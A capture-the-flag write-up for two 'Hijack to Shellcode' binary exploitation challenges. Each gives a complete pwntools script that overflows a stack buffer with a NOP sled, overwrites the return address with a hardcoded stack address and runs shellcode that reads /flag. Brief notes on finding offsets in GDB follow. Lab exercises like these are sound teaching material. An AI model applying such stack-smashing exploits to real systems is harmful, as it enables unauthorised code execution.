Hijack to Shellcode¶
Hijack to Shellcode (easy)¶
- ASLR is disabled
- Buffer address and saved frame pointer (rbp) address given in output -> get offset
from pwn import *
p = process('/challenge/binary-exploitation-hijack-to-shellcode-w')
context.arch = 'amd64'
shellcode = asm(shellcraft.amd64.cat('/flag'))
offset = 0x38
buff_start = 0x7fffffffd670
payload = b'\x90'*offset
payload += p64(buff_start+offset+0x8)
payload += shellcode
p.sendline(payload)
p.interactive()
Hijack to Shellcode (hard)¶
- ASLR disabled
- GDB -> set breakpoint after read and run -> get ebp
from pwn import *
context.arch = 'amd64'
p = process('/challenge/binary-exploitation-hijack-to-shellcode')
shellcode = asm(shellcraft.amd64.cat('/flag'))
# print(asm(shellcraft.amd64.cat('/flag')))
offset = 0x58
rbp = 0x7fffffffd6a0
payload = b'\x90'*offset
payload += p64(rbp+16)
payload += shellcode
with open("sc", "wb") as f:
f.write(payload)
p.sendline(payload)
p.interactive()
rbp = 0x7fffffffd690 from GDB, and shellcode does get executed when checked in GDB
r < <(cat sc); But in pwntools, rbp = 0x7fffffffd6a0 works. This 16-byte difference was also observed in easy version, where running in terminal printed buffer start as 0x7fffffffd660 while pwntools terminal printed 0x7fffffffd670